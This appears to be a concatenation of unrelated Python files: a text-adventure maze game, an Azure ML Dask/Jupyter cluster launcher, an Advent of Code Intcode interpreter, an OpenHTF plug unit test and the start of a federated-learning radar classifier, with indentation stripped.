: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: :,,,,,,,,,,,,+,,,,,,,,,,,,#,,,,,,,,,,,,@
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@#@@@@@@@@@@# @
: , @@.@@@#;@+;@@# @
: , @@.@@#,@'`@'@# @
: , @@.@@#.@+.@'@# @
: , @@@ Lion @@# @
: , @@@@@@@@@@@@@# @
: ,````````````@@@@@@@@@@@@@#````````````@
: ,````````````+````````````#````````````@
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
:
"""
)
mrmaze = game.new_location(
"MIDDLE RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
,`````````````,````````````@@@@@@@@@@@@@'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
brmaze = game.new_location(
"BOTTOM RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````@@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@:;;@@@+@@@@'
, , @@:'+#@+:##@@'
, , Exit '
, , @@;`.,@.;@.@@'
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
blmaze = game.new_location(
"BOTTOM LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,@@@@@@@@@@@@@,````````````;````````````'
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@`;'@@@'+@@@, ; '
,@@`'#;#@`+#@@, ; '
,@@`@@@`@`+@@@, ; '
,@@.` EXIT @@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
bmmaze = game.new_location(
"BOTTOM MIDDLE MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````@@@@@@@@@@@@@;````````````'
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
floor1 = game.new_location(
"Floor 1",
"""
Type END\
""")
stairs = game.new_connection("Stairs", floor5, floor4, [IN, DOWN], [UP, OUT])
fire_escape = game.new_connection("Side Room", floor4, side4, [IN, WEST], [EAST, OUT])
floor3stairs = game.new_connection("Stairs", floor4, corridoor, [IN, DOWN], [UP, OUT])
corridorrFloor3 = game.new_connection("Continue to Floor 3", corridoor, floor3, [IN, WEST], [EAST, OUT])
maze1 = game.new_connection("Maze 1", floor3, tlmaze, [IN, WEST], [EAST, OUT])
maze2 = game.new_connection("Maze 2", floor3, trmaze, [IN, EAST], [WEST, OUT])
maze3 = game.new_connection("Maze 3", mlmaze, tlmaze, [IN, NORTH], [SOUTH, OUT])
maze4 = game.new_connection("Maze 4", mmmaze, floor3, [IN, NORTH], [SOUTH, OUT])
maze5 = game.new_connection("Maze 5", mrmaze, trmaze, [IN, NORTH], [SOUTH, OUT])
maze6 = game.new_connection("Maze 6", mlmaze, mmmaze, [IN, EAST], [WEST, OUT])
maze7 = game.new_connection("Maze 7", mrmaze, mmmaze, [IN, WEST], [EAST, OUT])
maze8 = game.new_connection("Maze 8", blmaze, mlmaze, [IN, NORTH], [SOUTH, OUT])
maze9 = game.new_connection("Maze 9", bmmaze, mmmaze, [IN, NORTH], [SOUTH, OUT])
maze10 = game.new_connection("Maze 10", brmaze, mrmaze, [IN, NORTH], [SOUTH, OUT])
maze11 = game.new_connection("Maze 11", blmaze, bmmaze, [IN, EAST], [WEST, OUT])
maze12 = game.new_connection("Maze 12", brmaze, bmmaze, [IN, WEST], [EAST, OUT])
maze13 = game.new_connection("Maze 13", blmaze, floor5, [IN, SOUTH], [NORTH, OUT])
maze14 = game.new_connection("Maze 14", brmaze, floor1, [IN, SOUTH], [NORTH, OUT])
user = game.new_player(floor5)
user.add_verb(Verb(listen, "listen"))
user.add_verb(Verb(start, "start"))
user.add_verb(Verb(end, "end"))
game.run()
|
init_dask.py
|
import sys
import argparse
import time
import threading
import subprocess
import socket
from mpi4py import MPI
from azureml.core import Run
from notebook.notebookapp import list_running_servers
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == '' and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == '__main__':
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
ip = socket.gethostbyname(socket.gethostname())
parser = argparse.ArgumentParser()
parser.add_argument("--datastore")
parser.add_argument("--n_gpus_per_node")
parser.add_argument("--jupyter_token")
args = parser.parse_args()
n_gpus_per_node = eval(args.n_gpus_per_node)
print("number of GPUs per node:", n_gpus_per_node)
print("- my rank is ", rank)
print("- my ip is ", ip)
if rank == 0:
cluster = {
"scheduler" : ip + ":8786",
"dashboard" : ip + ":8787"
}
scheduler = cluster["scheduler"]
dashboard = cluster["dashboard"]
else:
cluster = None
cluster = comm.bcast(cluster, root=0)
scheduler = cluster["scheduler"]
dashboard = cluster["dashboard"]
if rank == 0:
Run.get_context().log("headnode", ip)
Run.get_context().log("cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(scheduler=cluster["scheduler"],
dashboard=cluster["dashboard"]))
Run.get_context().log("datastore", args.datastore)
cmd = ("jupyter lab --ip 0.0.0.0 --port 8888" + \
" --NotebookApp.token={token}" + \
" --allow-root --no-browser").format(token=args.jupyter_token)
jupyter_log = open("jupyter_log.txt", "a")
jupyter_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
while not list(list_running_servers()):
time.sleep(5)
jupyter_servers = list(list_running_servers())
assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
Run.get_context().log("jupyter",
"ip: {ip_addr}, port: {port}".format(ip_addr=ip, port=jupyter_servers[0]["port"]))
Run.get_context().log("jupyter-token", jupyter_servers[0]["token"])
cmd = "dask-scheduler " + "--port " + scheduler.split(":")[1] + " --dashboard-address " + dashboard
scheduler_log = open("scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
os.environ["CUDA_VISIBLE_DEVICES"] = str(list(range(n_gpus_per_node))).strip("[]")
cmd = "dask-cuda-worker " + scheduler + " --memory-limit 0"
worker_log = open("worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
flush(scheduler_proc, scheduler_log)
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(list(range(n_gpus_per_node))).strip("[]")
cmd = "dask-cuda-worker " + scheduler + " --memory-limit 0"
worker_log = open("worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
flush(worker_proc, worker_log)
|
day11-2.py
|
import queue
import threading
class Intcode:
def __init__(self, instructions, inputBuffer=queue.Queue(), outputBuffer=queue.Queue()):
self.instructions = instructions
self.inputBuffer = inputBuffer
self.outputBuffer = outputBuffer
self.relativeBase = 0
self.instructions.extend([-1 for i in range(2 ** 20 - self.instructions.__len__())])
def interpreter(self, index):
instruction = self.instructions[index] % 100
mode = int(self.instructions[index] / 100)
if instruction == 99:
return -1
elif instruction == 1: # add
return self.add(index, mode)
elif instruction == 2: # multiply
return self.multiply(index, mode)
elif instruction == 3: # read and store
return self.readAndStore(index, mode)
elif instruction == 4: # return value
return self.returnVal(index, mode)
elif instruction == 5: # jump-if-true
return self.jumpIfTrue(index, mode)
elif instruction == 6: # jump-if-false
return self.jumpIfFalse(index, mode)
elif instruction == 7: # less than
return self.lesThan(index, mode)
elif instruction == 8: # equals
return self.equals(index, mode)
elif instruction == 9: # adjust relative base
return self.adjustRelativeBase(index, mode)
def start(self):
t = threading.Thread(target=self.runProgram, args=())
t.start()
return t
def runProgram(self):
index = 0
while index != -1:
index = self.interpreter(index)
# instructions code
def add(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = arg1 + arg2
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = arg1 + arg2
return index + 4
def multiply(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = arg1 * arg2
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = arg1 * arg2
return index + 4
def readAndStore(self, index, mode):
if mode % 10 == 0:
self.instructions[self.instructions[index + 1]] = self.inputBuffer.get(True)
elif mode % 10 == 2:
self.instructions[self.instructions[index + 1] + self.relativeBase] = self.inputBuffer.get(True)
return index + 2
def returnVal(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
self.outputBuffer.put(arg1)
return index + 2
def jumpIfTrue(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 != 0:
return arg2
else:
return index + 3
def jumpIfFalse(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 == 0:
return arg2
else:
return index + 3
def lesThan(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 < arg2:
res = 1
else:
res = 0
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = res
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = res
return index + 4
def equals(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 == arg2:
res = 1
else:
res = 0
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = res
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = res
return index + 4
def adjustRelativeBase(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
self.relativeBase += arg1
return index + 2
with open("input.txt") as f:
data = f.read()
instructions = list(map(int, data.split(",")))
painter = Intcode(instructions)
ioin = painter.inputBuffer
ioout = painter.outputBuffer
orientation = 0
canvas = {}
t = painter.start()
position = (0, 0)
ioin.put(1)
color = ioout.get()
canvas[position] = color
direction = ioout.get()
if direction == 1:
orientation += 1
elif direction == 0:
orientation -= 1
orientation = orientation % 4
if orientation == 0:
position = (position[0] + 1, position[1])
elif orientation == 1:
position = (position[0], position[1] + 1)
elif orientation == 2:
position = (position[0] - 1, position[1])
elif orientation == 3:
position = (position[0], position[1] - 1)
while t.is_alive():
if position in canvas.keys():
oldColor = canvas[position]
else:
oldColor = 0
ioin.put(oldColor)
color = ioout.get()
canvas[position] = color
direction = ioout.get()
if direction == 1:
orientation += 1
elif direction == 0:
orientation -= 1
orientation = orientation % 4
if orientation == 0:
position = (position[0] + 1, position[1])
elif orientation == 1:
position = (position[0], position[1] + 1)
elif orientation == 2:
position = (position[0] - 1, position[1])
elif orientation == 3:
position = (position[0], position[1] - 1)
for i in range(min(canvas.keys(), key=lambda x: x[0])[0], 1).__reversed__():
for j in range(max(canvas.keys(), key=lambda x: abs(x[1]))[1] + 1):
if (i, j) in canvas.keys():
char = canvas[(i, j)]
# print(canvas[(i,j)],end=" ")
else:
# print(" ",end=" ")
char = 0
if char == 1:
print("#", end="")
else:
print(" ", end="")
print()
|
plugs_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import mock
import openhtf
from openhtf import plugs
from openhtf.util import test
class AdderPlug(plugs.FrontendAwareBasePlug):
INSTANCE_COUNT = 0
LAST_INSTANCE = None
def __init__(self):
super(AdderPlug, self).__init__()
type(self).INSTANCE_COUNT += 1
type(self).LAST_INSTANCE = self
self.state = 'CREATED'
self.number = 0
def _asdict(self):
return {'number': self.number}
def increment(self):
self.number += 1
self.notify_update()
return self.number
def tearDown(self):
self.state = 'TORN DOWN'
class AdderSubclassPlug(AdderPlug):
pass
class DummyPlug(plugs.BasePlug):
pass
class TearDownRaisesPlug1(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class TearDownRaisesPlug2(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class PlugsTest(test.TestCase):
def setUp(self):
self.plug_manager = plugs.PlugManager(
{AdderPlug}, record_logger_name='mock.logger.for.openhtf')
AdderPlug.INSTANCE_COUNT = 0
def tearDown(self):
self.plug_manager.tear_down_plugs()
def test_base_plug(self):
plug = plugs.BasePlug()
self.assertEqual({}, plug._asdict())
plug.tearDown()
def test_initialize(self):
self.assertEqual(0, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs({AdderPlug})
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(
AdderPlug.LAST_INSTANCE,
self.plug_manager.provide_plugs(
(('adder_plug', AdderPlug),))['adder_plug'])
self.assertEqual(self.plug_manager._asdict()['plug_descriptors'], {
'plugs_test.AdderPlug': {'mro': ['plugs_test.AdderPlug']},
})
self.assertEqual(self.plug_manager._asdict()['plug_states'], {
'plugs_test.AdderPlug': {'number': 0},
})
self.assertEqual('CREATED', AdderPlug.LAST_INSTANCE.state)
@test.yields_phases
def test_multiple_plugs(self):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(other_plug=AdderPlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
self.assertIs(AdderPlug.LAST_INSTANCE, other_plug)
yield dummy_phase
@plugs.plug(adder_plug=AdderPlug,
other_plug=plugs.BasePlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
yield dummy_phase
@test.yields_phases
def test_plug_logging(self):
"""Test that both __init__ and other functions get the good logger."""
class LoggingPlug(plugs.BasePlug):
def __init__(self):
self.logger_seen_init = self.logger
def action(self):
self.logger_seen_action = self.logger
@plugs.plug(logger=LoggingPlug)
def dummy_phase(test_api, logger):
logger.action()
self.assertIs(logger.logger_seen_init, logger.logger_seen_action)
self.assertIs(logger.logger_seen_init, self.logger)
yield dummy_phase
def test_tear_down_raises(self):
"""Test that all plugs get torn down even if some raise."""
self.plug_manager.initialize_plugs({
TearDownRaisesPlug1, TearDownRaisesPlug2})
self.plug_manager.tear_down_plugs()
self.assertTrue(TearDownRaisesPlug1.TORN_DOWN)
self.assertTrue(TearDownRaisesPlug2.TORN_DOWN)
def test_plug_updates(self):
self.plug_manager.initialize_plugs({AdderPlug})
update = self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', {}, .001)
self.assertEqual({'number': 0}, update)
# No update since last time, this should time out (return None).
self.assertIsNone(self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', update, .001))
def _delay_then_update():
time.sleep(.5)
self.assertEqual(1, AdderPlug.LAST_INSTANCE.increment())
threading.Thread(target=_delay_then_update).start()
start_time = time.time()
self.assertEqual({'number': 1}, self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', update, 5))
self.assertGreater(time.time() - start_time, .2)
def test_invalid_plug(self):
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({object})
with self.assertRaises(plugs.InvalidPlugError):
plugs.plug(adder_plug=object)
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({
type('BadPlug', (plugs.BasePlug,), {'logger': None})})
with self.assertRaises(plugs.InvalidPlugError):
class BadPlugInit(plugs.BasePlug):
def __init__(self):
self.logger = None
self.plug_manager.initialize_plugs({BadPlugInit})
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.wait_for_plug_update('invalid', {}, 0)
def test_duplicate_plug(self):
with self.assertRaises(plugs.DuplicatePlugError):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(adder_plug=AdderPlug)
def dummy_phase(test, adder_plug):
pass
def test_uses_base_tear_down(self):
self.assertTrue(plugs.BasePlug().uses_base_tear_down())
self.assertTrue(DummyPlug().uses_base_tear_down())
self.assertFalse(AdderPlug().uses_base_tear_down())
self.assertFalse(AdderSubclassPlug().uses_base_tear_down())
self.assertFalse(TearDownRaisesPlug1().uses_base_tear_down())
|
federated_learning_keras_consensus_FL_sidelink.py
|
from DataSets import RadarData
from DataSets_tasks import RadarData_tasks
from consensus.consensus_v4 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus , PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=0, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=1, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.00025, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.1, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=4, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=4, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=15, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=3, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=5, help="sets the batch size per learning round", type=int)
parser.add_argument('-input_data', default='data_mimoradar/data_mmwave_900.mat', help="sets the path to the federated dataset", type=str)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 400
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus, create the scheduling function ################
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
if active_devices_per_round > devices:
active_devices_per_round = devices
filepath = args.input_data
target_loss = args.target
# Configuration paramaters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
validation_train = 900 # VALIDATION and training DATASET size
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_train/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1 # consensus max delay 2= 2 epochs max
refresh_server = 1 # refresh server updates (in sec)
n_outputs = 6 # 6 classes
validation_start = 1 # start validation in epochs
# Using huber loss for stability
# loss_function = keras.losses.Huber()
# Using crossentropy
loss_function = tf.keras.losses.CategoricalCrossentropy(
from_logits=False,
label_smoothing=0,
reduction="auto",
name="categorical_crossentropy",
)
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
# def get_noniid_data(total_training_size, devices, batch_size):
# samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
# devices) # create random numbers
# samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# # Ignore the following if you don't need integers
# samples = np.round(samples) # transform them into integers
# remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
# step = 1 if remainings > 0 else -1
# while remainings != 0:
# i = np.random.randint(devices)
# if samples[i] + step >= 0:
# samples[i] += step
# remainings -= step
# return samples
####
def preprocess_observation(obs, batch_size):
img = obs# crop and downsize
img = (img).astype(np.float)
return img.reshape(batch_size, 256, 63, 1)
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(256, 63, 1,))
# Convolutions
layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(512, activation="relu")(layer4)
classification = layers.Dense(n_outputs, activation="softmax")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
